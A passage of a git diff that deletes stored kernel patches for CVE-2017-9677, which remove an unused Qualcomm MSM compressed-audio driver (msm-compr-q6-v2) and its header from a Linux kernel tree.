arg); -- } --bail_out: -- return err; -- --} --#endif --static int msm_compr_ioctl(struct snd_pcm_substream *substream, -- unsigned int cmd, void *arg) --{ -- int err = 0; -- if (!substream) { -- pr_err("%s: Invalid params\n", __func__); -- return -EINVAL; -- } -- pr_debug("%s called with cmd = %d\n", __func__, cmd); -- switch (cmd) { -- case SNDRV_COMPRESS_TSTAMP: { -- struct snd_compr_tstamp 
tstamp; -- if (!arg) { -- pr_err("%s: Invalid params Tstamp\n", __func__); -- return -EINVAL; -- } -- err = msm_compr_ioctl_shared(substream, cmd, &tstamp); -- if (err) -- pr_err("%s: COMPRESS_TSTAMP failed rc %d\n", -- __func__, err); -- if (!err && copy_to_user(arg, &tstamp, sizeof(tstamp))) { -- pr_err("%s: copytouser failed COMPRESS_TSTAMP\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_GET_CAPS: { -- struct snd_compr_caps cap; -- if (!arg) { -- pr_err("%s: Invalid params getcaps\n", __func__); -- return -EINVAL; -- } -- pr_debug("SNDRV_COMPRESS_GET_CAPS\n"); -- err = msm_compr_ioctl_shared(substream, cmd, &cap); -- if (err) -- pr_err("%s: GET_CAPS failed rc %d\n", -- __func__, err); -- if (!err && copy_to_user(arg, &cap, sizeof(cap))) { -- pr_err("%s: copytouser failed GET_CAPS\n", -- __func__); -- err = -EFAULT; -- } -- break; -- } -- case SNDRV_COMPRESS_SET_PARAMS: { -- struct snd_compr_params params; -- if (!arg) { -- pr_err("%s: Invalid params setparam\n", __func__); -- return -EINVAL; -- } -- if (copy_from_user(¶ms, arg, -- sizeof(struct snd_compr_params))) { -- pr_err("%s: SET_PARAMS\n", __func__); -- return -EFAULT; -- } -- err = msm_compr_ioctl_shared(substream, cmd, ¶ms); -- if (err) -- pr_err("%s: SET_PARAMS failed rc %d\n", -- __func__, err); -- break; -- } -- default: -- err = msm_compr_ioctl_shared(substream, cmd, arg); -- } -- return err; --} -- --static int msm_compr_restart(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct audio_aio_write_param param; -- struct audio_buffer *buf = NULL; -- struct output_meta_data_st output_meta_data; -- int time_stamp_flag = 0; -- int buffer_length = 0; -- -- pr_debug("%s, trigger restart\n", __func__); -- -- if (runtime->render_flag & SNDRV_RENDER_STOPPED) { -- buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s:writing %d 
bytes of buffer[%d] to dsp 2\n", -- __func__, prtd->pcm_count, prtd->out_head); -- pr_debug("%s:writing buffer[%d] from 0x%08x\n", -- __func__, prtd->out_head, -- ((unsigned int)buf[0].phys -- + (prtd->out_head * prtd->pcm_count))); -- -- if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -- time_stamp_flag = SET_TIMESTAMP; -- else -- time_stamp_flag = NO_TIMESTAMP; -- memcpy(&output_meta_data, (char *)(buf->data + -- prtd->out_head * prtd->pcm_count), -- COMPRE_OUTPUT_METADATA_SIZE); -- -- buffer_length = output_meta_data.frame_size; -- pr_debug("meta_data_length: %d, frame_length: %d\n", -- output_meta_data.meta_data_length, -- output_meta_data.frame_size); -- pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n", -- output_meta_data.timestamp_msw, -- output_meta_data.timestamp_lsw); -- -- param.paddr = (unsigned long)buf[0].phys -- + (prtd->out_head * prtd->pcm_count) -- + output_meta_data.meta_data_length; -- param.len = buffer_length; -- param.msw_ts = output_meta_data.timestamp_msw; -- param.lsw_ts = output_meta_data.timestamp_lsw; -- param.flags = time_stamp_flag; -- param.uid = prtd->session_id; -- if (q6asm_async_write(prtd->audio_client, -- ¶m) < 0) -- pr_err("%s:q6asm_async_write failed\n", -- __func__); -- else -- prtd->out_head = -- (prtd->out_head + 1) & (runtime->periods - 1); -- -- runtime->render_flag &= ~SNDRV_RENDER_STOPPED; -- return 0; -- } -- return 0; --} -- --static int msm_compr_volume_ctl_put(struct snd_kcontrol *kcontrol, -- struct snd_ctl_elem_value *ucontrol) --{ -- int rc = 0; -- struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol); -- struct snd_pcm_substream *substream = -- vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream; -- struct msm_audio *prtd; -- int volume = ucontrol->value.integer.value[0]; -- -- pr_debug("%s: volume : %x\n", __func__, volume); -- if (!substream) -- return -ENODEV; -- if (!substream->runtime) -- return 0; -- prtd = substream->runtime->private_data; -- if (prtd) -- rc = compressed_set_volume(prtd, 
volume); -- -- return rc; --} -- --static int msm_compr_volume_ctl_get(struct snd_kcontrol *kcontrol, -- struct snd_ctl_elem_value *ucontrol) --{ -- struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol); -- struct snd_pcm_substream *substream = -- vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream; -- struct msm_audio *prtd; -- -- pr_debug("%s\n", __func__); -- if (!substream) -- return -ENODEV; -- if (!substream->runtime) -- return 0; -- prtd = substream->runtime->private_data; -- if (prtd) -- ucontrol->value.integer.value[0] = prtd->volume; -- return 0; --} -- --static int msm_compr_add_controls(struct snd_soc_pcm_runtime *rtd) --{ -- int ret = 0; -- struct snd_pcm *pcm = rtd->pcm; -- struct snd_pcm_volume *volume_info; -- struct snd_kcontrol *kctl; -- -- dev_dbg(rtd->dev, "%s, Volume cntrl add\n", __func__); -- ret = snd_pcm_add_volume_ctls(pcm, SNDRV_PCM_STREAM_PLAYBACK, -- NULL, 1, rtd->dai_link->be_id, -- &volume_info); -- if (ret < 0) -- return ret; -- kctl = volume_info->kctl; -- kctl->put = msm_compr_volume_ctl_put; -- kctl->get = msm_compr_volume_ctl_get; -- kctl->tlv.p = compr_rx_vol_gain; -- return 0; --} -- --static struct snd_pcm_ops msm_compr_ops = { -- .open = msm_compr_open, -- .hw_params = msm_compr_hw_params, -- .close = msm_compr_close, -- .ioctl = msm_compr_ioctl, -- .prepare = msm_compr_prepare, -- .trigger = msm_compr_trigger, -- .pointer = msm_compr_pointer, -- .mmap = msm_compr_mmap, -- .restart = msm_compr_restart, --#ifdef CONFIG_COMPAT -- .compat_ioctl = msm_compr_compat_ioctl, --#endif --}; -- --static int msm_asoc_pcm_new(struct snd_soc_pcm_runtime *rtd) --{ -- struct snd_card *card = rtd->card->snd_card; -- int ret = 0; -- -- if (!card->dev->coherent_dma_mask) -- card->dev->coherent_dma_mask = DMA_BIT_MASK(32); -- -- ret = msm_compr_add_controls(rtd); -- if (ret) -- pr_err("%s, kctl add failed\n", __func__); -- return ret; --} -- --static struct snd_soc_platform_driver msm_soc_platform = { -- .ops = &msm_compr_ops, -- .pcm_new 
= msm_asoc_pcm_new, --}; -- --static int msm_compr_probe(struct platform_device *pdev) --{ -- -- dev_info(&pdev->dev, "%s: dev name %s\n", -- __func__, dev_name(&pdev->dev)); -- -- atomic_set(&compressed_audio.audio_ocmem_req, 0); -- return snd_soc_register_platform(&pdev->dev, -- &msm_soc_platform); --} -- --static int msm_compr_remove(struct platform_device *pdev) --{ -- snd_soc_unregister_platform(&pdev->dev); -- return 0; --} -- --static const struct of_device_id msm_compr_dt_match[] = { -- {.compatible = "qcom,msm-compr-dsp"}, -- {} --}; --MODULE_DEVICE_TABLE(of, msm_compr_dt_match); -- --static struct platform_driver msm_compr_driver = { -- .driver = { -- .name = "msm-compr-dsp", -- .owner = THIS_MODULE, -- .of_match_table = msm_compr_dt_match, -- }, -- .probe = msm_compr_probe, -- .remove = msm_compr_remove, --}; -- --static int __init msm_soc_platform_init(void) --{ -- init_waitqueue_head(&the_locks.enable_wait); -- init_waitqueue_head(&the_locks.eos_wait); -- init_waitqueue_head(&the_locks.write_wait); -- init_waitqueue_head(&the_locks.read_wait); -- init_waitqueue_head(&the_locks.flush_wait); -- -- return platform_driver_register(&msm_compr_driver); --} --module_init(msm_soc_platform_init); -- --static void __exit msm_soc_platform_exit(void) --{ -- platform_driver_unregister(&msm_compr_driver); --} --module_exit(msm_soc_platform_exit); -- --MODULE_DESCRIPTION("PCM module platform driver"); --MODULE_LICENSE("GPL v2"); -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h -deleted file mode 100644 -index d6e3ec6..0000000 ---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h -+++ /dev/null -@@ -1,36 +0,0 @@ --/* -- * Copyright (c) 2012, The Linux Foundation. All rights reserved. -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 and -- * only version 2 as published by the Free Software Foundation. 
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MSM_COMPR_H
--#define _MSM_COMPR_H
--#include
--#include
--#include
--#include
--#include
--
--#include "msm-pcm-q6-v2.h"
--
--struct compr_info {
-- struct snd_compr_caps compr_cap;
-- struct snd_compr_codec_caps codec_caps;
-- struct snd_compr_params codec_param;
--};
--
--struct compr_audio {
-- struct msm_audio prtd;
-- struct compr_info info;
-- uint32_t codec;
--};
--
--#endif /*_MSM_COMPR_H*/
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9677/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-9677/3.18/0002.patch
deleted file mode 100644
index 33e0cd6b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9677/3.18/0002.patch
+++ /dev/null
@@ -1,1774 +0,0 @@ -From dc333eb1c31b5bdd2b6375d7cb890086d8f27d8b Mon Sep 17 00:00:00 2001 -From: Xiaojun Sang -Date: Thu, 27 Apr 2017 14:44:25 +0800 -Subject: ASoC: msm: remove unused msm-compr-q6-v2 - -msm-compr-q6-v2.c and msm-compr-q6-v2.h are no longer used. - -CRs-Fixed: 2022953 -Change-Id: I856d90a212a3e123a2c8b80092aff003f7c608c7 -Signed-off-by: Xiaojun Sang ---- - sound/soc/msm/qdsp6v2/Makefile | 2 +- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 1694 ------------------------------- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h | 36 - - 3 files changed, 1 insertion(+), 1731 deletions(-) - delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c - delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h - -diff --git a/sound/soc/msm/qdsp6v2/Makefile b/sound/soc/msm/qdsp6v2/Makefile -index 8e1aa30..7abaaad 100644 ---- a/sound/soc/msm/qdsp6v2/Makefile -+++ b/sound/soc/msm/qdsp6v2/Makefile -@@ -1,5 +1,5 @@ - snd-soc-qdsp6v2-objs += msm-dai-q6-v2.o msm-pcm-q6-v2.o msm-pcm-routing-v2.o \ -- msm-compress-q6-v2.o msm-compr-q6-v2.o \ -+ msm-compress-q6-v2.o \ - msm-pcm-lpa-v2.o \ - msm-pcm-afe-v2.o msm-pcm-voip-v2.o \ - msm-pcm-voice-v2.o msm-dai-q6-hdmi-v2.o \ -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -deleted file mode 100644 -index 58a4de5..0000000 ---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -+++ /dev/null -@@ -1,1694 +0,0 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 and -- * only version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */ -- -- --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#include -- --#include "msm-compr-q6-v2.h" --#include "msm-pcm-routing-v2.h" --#include -- --#define COMPRE_CAPTURE_NUM_PERIODS 16 --/* Allocate the worst case frame size for compressed audio */ --#define COMPRE_CAPTURE_HEADER_SIZE (sizeof(struct snd_compr_audio_info)) --/* Changing period size to 4032. 4032 will make sure COMPRE_CAPTURE_PERIOD_SIZE -- * is 4096 with meta data size of 64 and MAX_NUM_FRAMES_PER_BUFFER 1 -- */ --#define COMPRE_CAPTURE_MAX_FRAME_SIZE (4032) --#define COMPRE_CAPTURE_PERIOD_SIZE ((COMPRE_CAPTURE_MAX_FRAME_SIZE + \ -- COMPRE_CAPTURE_HEADER_SIZE) * \ -- MAX_NUM_FRAMES_PER_BUFFER) --#define COMPRE_OUTPUT_METADATA_SIZE (sizeof(struct output_meta_data_st)) --#define COMPRESSED_LR_VOL_MAX_STEPS 0x20002000 -- --#define MAX_AC3_PARAM_SIZE (18*2*sizeof(int)) --#define AMR_WB_BAND_MODE 8 --#define AMR_WB_DTX_MODE 0 -- -- --const DECLARE_TLV_DB_LINEAR(compr_rx_vol_gain, 0, -- COMPRESSED_LR_VOL_MAX_STEPS); -- --static struct audio_locks the_locks; -- --static struct snd_pcm_hardware msm_compr_hardware_capture = { -- .info = (SNDRV_PCM_INFO_MMAP | -- SNDRV_PCM_INFO_BLOCK_TRANSFER | -- SNDRV_PCM_INFO_MMAP_VALID | -- SNDRV_PCM_INFO_INTERLEAVED | -- SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME), -- .formats = SNDRV_PCM_FMTBIT_S16_LE, -- .rates = SNDRV_PCM_RATE_8000_48000, -- .rate_min = 8000, -- .rate_max = 48000, -- .channels_min = 1, -- .channels_max = 8, -- .buffer_bytes_max = -- COMPRE_CAPTURE_PERIOD_SIZE * COMPRE_CAPTURE_NUM_PERIODS , -- .period_bytes_min = COMPRE_CAPTURE_PERIOD_SIZE, -- .period_bytes_max = COMPRE_CAPTURE_PERIOD_SIZE, -- .periods_min = COMPRE_CAPTURE_NUM_PERIODS, -- .periods_max = COMPRE_CAPTURE_NUM_PERIODS, -- .fifo_size = 0, --}; -- --static struct snd_pcm_hardware msm_compr_hardware_playback = { -- .info = 
(SNDRV_PCM_INFO_MMAP | -- SNDRV_PCM_INFO_BLOCK_TRANSFER | -- SNDRV_PCM_INFO_MMAP_VALID | -- SNDRV_PCM_INFO_INTERLEAVED | -- SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME), -- .formats = SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE, -- .rates = SNDRV_PCM_RATE_8000_48000 | SNDRV_PCM_RATE_KNOT, -- .rate_min = 8000, -- .rate_max = 48000, -- .channels_min = 1, -- .channels_max = 8, -- .buffer_bytes_max = 1024 * 1024, -- .period_bytes_min = 128 * 1024, -- .period_bytes_max = 256 * 1024, -- .periods_min = 4, -- .periods_max = 8, -- .fifo_size = 0, --}; -- --/* Conventional and unconventional sample rate supported */ --static unsigned int supported_sample_rates[] = { -- 8000, 11025, 12000, 16000, 22050, 24000, 32000, 44100, 48000 --}; -- --/* Add supported codecs for compress capture path */ --static uint32_t supported_compr_capture_codecs[] = { -- SND_AUDIOCODEC_AMRWB --}; -- --static struct snd_pcm_hw_constraint_list constraints_sample_rates = { -- .count = ARRAY_SIZE(supported_sample_rates), -- .list = supported_sample_rates, -- .mask = 0, --}; -- --static bool msm_compr_capture_codecs(uint32_t req_codec) --{ -- int i; -- pr_debug("%s req_codec:%d\n", __func__, req_codec); -- if (req_codec == 0) -- return false; -- for (i = 0; i < ARRAY_SIZE(supported_compr_capture_codecs); i++) { -- if (req_codec == supported_compr_capture_codecs[i]) -- return true; -- } -- return false; --} -- --static void compr_event_handler(uint32_t opcode, -- uint32_t token, uint32_t *payload, void *priv) --{ -- struct compr_audio *compr = priv; -- struct msm_audio *prtd = &compr->prtd; -- struct snd_pcm_substream *substream = prtd->substream; -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct audio_aio_write_param param; -- struct audio_aio_read_param read_param; -- struct audio_buffer *buf = NULL; -- phys_addr_t temp; -- struct output_meta_data_st output_meta_data; -- uint32_t *ptrmem = (uint32_t *)payload; -- int i = 0; -- int time_stamp_flag = 0; -- int buffer_length = 0; 
-- int stop_playback = 0; -- -- pr_debug("%s opcode =%08x\n", __func__, opcode); -- switch (opcode) { -- case ASM_DATA_EVENT_WRITE_DONE_V2: { -- uint32_t *ptrmem = (uint32_t *)¶m; -- pr_debug("ASM_DATA_EVENT_WRITE_DONE\n"); -- pr_debug("Buffer Consumed = 0x%08x\n", *ptrmem); -- prtd->pcm_irq_pos += prtd->pcm_count; -- if (atomic_read(&prtd->start)) -- snd_pcm_period_elapsed(substream); -- else -- if (substream->timer_running) -- snd_timer_interrupt(substream->timer, 1); -- atomic_inc(&prtd->out_count); -- wake_up(&the_locks.write_wait); -- if (!atomic_read(&prtd->start)) { -- atomic_set(&prtd->pending_buffer, 1); -- break; -- } else -- atomic_set(&prtd->pending_buffer, 0); -- -- /* -- * check for underrun -- */ -- snd_pcm_stream_lock_irq(substream); -- if (runtime->status->hw_ptr >= runtime->control->appl_ptr) { -- runtime->render_flag |= SNDRV_RENDER_STOPPED; -- stop_playback = 1; -- } -- snd_pcm_stream_unlock_irq(substream); -- -- if (stop_playback) { -- pr_err("underrun! render stopped\n"); -- break; -- } -- -- buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n", -- __func__, prtd->pcm_count, prtd->out_head); -- temp = buf[0].phys + (prtd->out_head * prtd->pcm_count); -- pr_debug("%s:writing buffer[%d] from 0x%pK\n", -- __func__, prtd->out_head, &temp); -- -- if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -- time_stamp_flag = SET_TIMESTAMP; -- else -- time_stamp_flag = NO_TIMESTAMP; -- memcpy(&output_meta_data, (char *)(buf->data + -- prtd->out_head * prtd->pcm_count), -- COMPRE_OUTPUT_METADATA_SIZE); -- -- buffer_length = output_meta_data.frame_size; -- pr_debug("meta_data_length: %d, frame_length: %d\n", -- output_meta_data.meta_data_length, -- output_meta_data.frame_size); -- pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n", -- output_meta_data.timestamp_msw, -- output_meta_data.timestamp_lsw); -- if (buffer_length == 0) { -- pr_debug("Recieved a zero length buffer-break out"); -- break; -- } -- 
param.paddr = temp + output_meta_data.meta_data_length; -- param.len = buffer_length; -- param.msw_ts = output_meta_data.timestamp_msw; -- param.lsw_ts = output_meta_data.timestamp_lsw; -- param.flags = time_stamp_flag; -- param.uid = prtd->session_id; -- for (i = 0; i < sizeof(struct audio_aio_write_param)/4; -- i++, ++ptrmem) -- pr_debug("cmd[%d]=0x%08x\n", i, *ptrmem); -- if (q6asm_async_write(prtd->audio_client, -- ¶m) < 0) -- pr_err("%s:q6asm_async_write failed\n", -- __func__); -- else -- prtd->out_head = -- (prtd->out_head + 1) & (runtime->periods - 1); -- break; -- } -- case ASM_DATA_EVENT_RENDERED_EOS: -- pr_debug("ASM_DATA_CMDRSP_EOS\n"); -- if (atomic_read(&prtd->eos)) { -- pr_debug("ASM_DATA_CMDRSP_EOS wake up\n"); -- prtd->cmd_ack = 1; -- wake_up(&the_locks.eos_wait); -- atomic_set(&prtd->eos, 0); -- } -- break; -- case ASM_DATA_EVENT_READ_DONE_V2: { -- pr_debug("ASM_DATA_EVENT_READ_DONE\n"); -- pr_debug("buf = %pK, data = 0x%X, *data = %pK,\n" -- "prtd->pcm_irq_pos = %d\n", -- prtd->audio_client->port[OUT].buf, -- *(uint32_t *)prtd->audio_client->port[OUT].buf->data, -- prtd->audio_client->port[OUT].buf->data, -- prtd->pcm_irq_pos); -- -- memcpy(prtd->audio_client->port[OUT].buf->data + -- prtd->pcm_irq_pos, (ptrmem + READDONE_IDX_SIZE), -- COMPRE_CAPTURE_HEADER_SIZE); -- pr_debug("buf = %pK, updated data = 0x%X, *data = %pK\n", -- prtd->audio_client->port[OUT].buf, -- *(uint32_t *)(prtd->audio_client->port[OUT].buf->data + -- prtd->pcm_irq_pos), -- prtd->audio_client->port[OUT].buf->data); -- if (!atomic_read(&prtd->start)) -- break; -- pr_debug("frame size=%d, buffer = 0x%X\n", -- ptrmem[READDONE_IDX_SIZE], -- ptrmem[READDONE_IDX_BUFADD_LSW]); -- if (ptrmem[READDONE_IDX_SIZE] > COMPRE_CAPTURE_MAX_FRAME_SIZE) { -- pr_err("Frame length exceeded the max length"); -- break; -- } -- buf = prtd->audio_client->port[OUT].buf; -- -- pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pK\n", -- prtd->pcm_irq_pos, &buf[0].phys); -- read_param.len = prtd->pcm_count - 
COMPRE_CAPTURE_HEADER_SIZE; -- read_param.paddr = buf[0].phys + -- prtd->pcm_irq_pos + COMPRE_CAPTURE_HEADER_SIZE; -- prtd->pcm_irq_pos += prtd->pcm_count; -- -- if (atomic_read(&prtd->start)) -- snd_pcm_period_elapsed(substream); -- -- q6asm_async_read(prtd->audio_client, &read_param); -- break; -- } -- case APR_BASIC_RSP_RESULT: { -- switch (payload[0]) { -- case ASM_SESSION_CMD_RUN_V2: { -- if (substream->stream -- != SNDRV_PCM_STREAM_PLAYBACK) { -- atomic_set(&prtd->start, 1); -- break; -- } -- if (!atomic_read(&prtd->pending_buffer)) -- break; -- pr_debug("%s: writing %d bytes of buffer[%d] to dsp\n", -- __func__, prtd->pcm_count, prtd->out_head); -- buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s: writing buffer[%d] from 0x%pK head %d count %d\n", -- __func__, prtd->out_head, &buf[0].phys, -- prtd->pcm_count, prtd->out_head); -- if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -- time_stamp_flag = SET_TIMESTAMP; -- else -- time_stamp_flag = NO_TIMESTAMP; -- memcpy(&output_meta_data, (char *)(buf->data + -- prtd->out_head * prtd->pcm_count), -- COMPRE_OUTPUT_METADATA_SIZE); -- buffer_length = output_meta_data.frame_size; -- pr_debug("meta_data_length: %d, frame_length: %d\n", -- output_meta_data.meta_data_length, -- output_meta_data.frame_size); -- pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n", -- output_meta_data.timestamp_msw, -- output_meta_data.timestamp_lsw); -- param.paddr = buf[prtd->out_head].phys -- + output_meta_data.meta_data_length; -- param.len = buffer_length; -- param.msw_ts = output_meta_data.timestamp_msw; -- param.lsw_ts = output_meta_data.timestamp_lsw; -- param.flags = time_stamp_flag; -- param.uid = prtd->session_id; -- param.metadata_len = COMPRE_OUTPUT_METADATA_SIZE; -- if (q6asm_async_write(prtd->audio_client, -- ¶m) < 0) -- pr_err("%s:q6asm_async_write failed\n", -- __func__); -- else -- prtd->out_head = -- (prtd->out_head + 1) -- & (runtime->periods - 1); -- atomic_set(&prtd->pending_buffer, 0); -- } -- break; -- case 
ASM_STREAM_CMD_FLUSH: -- pr_debug("ASM_STREAM_CMD_FLUSH\n"); -- prtd->cmd_ack = 1; -- wake_up(&the_locks.flush_wait); -- break; -- default: -- break; -- } -- break; -- } -- default: -- pr_debug("Not Supported Event opcode[0x%x]\n", opcode); -- break; -- } --} -- --static int msm_compr_send_ddp_cfg(struct audio_client *ac, -- struct snd_dec_ddp *ddp) --{ -- int i, rc; -- pr_debug("%s\n", __func__); -- -- if (ddp->params_length / 2 > SND_DEC_DDP_MAX_PARAMS) { -- pr_err("%s: Invalid number of params %u, max allowed %u\n", -- __func__, ddp->params_length / 2, -- SND_DEC_DDP_MAX_PARAMS); -- return -EINVAL; -- } -- -- for (i = 0; i < ddp->params_length/2; i++) { -- rc = q6asm_ds1_set_endp_params(ac, ddp->params_id[i], -- ddp->params_value[i]); -- if (rc) { -- pr_err("sending params_id: %d failed\n", -- ddp->params_id[i]); -- return rc; -- } -- } -- return 0; --} -- --static int msm_compr_playback_prepare(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct snd_pcm_hw_params *params; -- struct asm_aac_cfg aac_cfg; -- uint16_t bits_per_sample = 16; -- int ret; -- -- struct asm_softpause_params softpause = { -- .enable = SOFT_PAUSE_ENABLE, -- .period = SOFT_PAUSE_PERIOD, -- .step = SOFT_PAUSE_STEP, -- .rampingcurve = SOFT_PAUSE_CURVE_LINEAR, -- }; -- struct asm_softvolume_params softvol = { -- .period = SOFT_VOLUME_PERIOD, -- .step = SOFT_VOLUME_STEP, -- .rampingcurve = SOFT_VOLUME_CURVE_LINEAR, -- }; -- -- pr_debug("%s\n", __func__); -- -- params = &soc_prtd->dpcm[substream->stream].hw_params; -- if (runtime->format == SNDRV_PCM_FORMAT_S24_LE) -- bits_per_sample = 24; -- -- ret = q6asm_open_write_v2(prtd->audio_client, -- compr->codec, bits_per_sample); -- if (ret < 0) { -- pr_err("%s: Session out open failed\n", -- __func__); -- return -ENOMEM; -- } -- 
msm_pcm_routing_reg_phy_stream( -- soc_prtd->dai_link->be_id, -- prtd->audio_client->perf_mode, -- prtd->session_id, -- substream->stream); -- /* -- * the number of channels are required to call volume api -- * accoridngly. So, get channels from hw params -- */ -- if ((params_channels(params) > 0) && -- (params_periods(params) <= runtime->hw.channels_max)) -- prtd->channel_mode = params_channels(params); -- -- ret = q6asm_set_softpause(prtd->audio_client, &softpause); -- if (ret < 0) -- pr_err("%s: Send SoftPause Param failed ret=%d\n", -- __func__, ret); -- ret = q6asm_set_softvolume(prtd->audio_client, &softvol); -- if (ret < 0) -- pr_err("%s: Send SoftVolume Param failed ret=%d\n", -- __func__, ret); -- -- ret = q6asm_set_io_mode(prtd->audio_client, -- (COMPRESSED_IO | ASYNC_IO_MODE)); -- if (ret < 0) { -- pr_err("%s: Set IO mode failed\n", __func__); -- return -ENOMEM; -- } -- -- prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream); -- prtd->pcm_count = snd_pcm_lib_period_bytes(substream); -- prtd->pcm_irq_pos = 0; -- /* rate and channels are sent to audio driver */ -- prtd->samp_rate = runtime->rate; -- prtd->channel_mode = runtime->channels; -- prtd->out_head = 0; -- atomic_set(&prtd->out_count, runtime->periods); -- -- if (prtd->enabled) -- return 0; -- -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_MP3: -- /* No media format block for mp3 */ -- break; -- case SND_AUDIOCODEC_AAC: -- pr_debug("%s: SND_AUDIOCODEC_AAC\n", __func__); -- memset(&aac_cfg, 0x0, sizeof(struct asm_aac_cfg)); -- aac_cfg.aot = AAC_ENC_MODE_EAAC_P; -- aac_cfg.format = 0x03; -- aac_cfg.ch_cfg = runtime->channels; -- aac_cfg.sample_rate = runtime->rate; -- ret = q6asm_media_format_block_aac(prtd->audio_client, -- &aac_cfg); -- if (ret < 0) -- pr_err("%s: CMD Format block failed\n", __func__); -- break; -- case SND_AUDIOCODEC_AC3: { -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- pr_debug("%s: SND_AUDIOCODEC_AC3\n", __func__); -- ret = 
msm_compr_send_ddp_cfg(prtd->audio_client, ddp); -- if (ret < 0) -- pr_err("%s: DDP CMD CFG failed\n", __func__); -- break; -- } -- case SND_AUDIOCODEC_EAC3: { -- struct snd_dec_ddp *ddp = -- &compr->info.codec_param.codec.options.ddp; -- pr_debug("%s: SND_AUDIOCODEC_EAC3\n", __func__); -- ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp); -- if (ret < 0) -- pr_err("%s: DDP CMD CFG failed\n", __func__); -- break; -- } -- default: -- return -EINVAL; -- } -- -- prtd->enabled = 1; -- prtd->cmd_ack = 0; -- prtd->cmd_interrupt = 0; -- -- return 0; --} -- --static int msm_compr_capture_prepare(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct audio_buffer *buf = prtd->audio_client->port[OUT].buf; -- struct snd_codec *codec = &compr->info.codec_param.codec; -- struct snd_soc_pcm_runtime *soc_prtd = substream->private_data; -- struct audio_aio_read_param read_param; -- uint16_t bits_per_sample = 16; -- int ret = 0; -- int i; -- -- prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream); -- prtd->pcm_count = snd_pcm_lib_period_bytes(substream); -- prtd->pcm_irq_pos = 0; -- -- if (runtime->format == SNDRV_PCM_FORMAT_S24_LE) -- bits_per_sample = 24; -- -- if (!msm_compr_capture_codecs( -- compr->info.codec_param.codec.id)) { -- /* -- * request codec invalid or not supported, -- * use default compress format -- */ -- compr->info.codec_param.codec.id = -- SND_AUDIOCODEC_AMRWB; -- } -- switch (compr->info.codec_param.codec.id) { -- case SND_AUDIOCODEC_AMRWB: -- pr_debug("q6asm_open_read(FORMAT_AMRWB)\n"); -- ret = q6asm_open_read(prtd->audio_client, -- FORMAT_AMRWB); -- if (ret < 0) { -- pr_err("%s: compressed Session out open failed\n", -- __func__); -- return -ENOMEM; -- } -- pr_debug("msm_pcm_routing_reg_phy_stream\n"); -- msm_pcm_routing_reg_phy_stream( -- soc_prtd->dai_link->be_id, -- prtd->audio_client->perf_mode, -- 
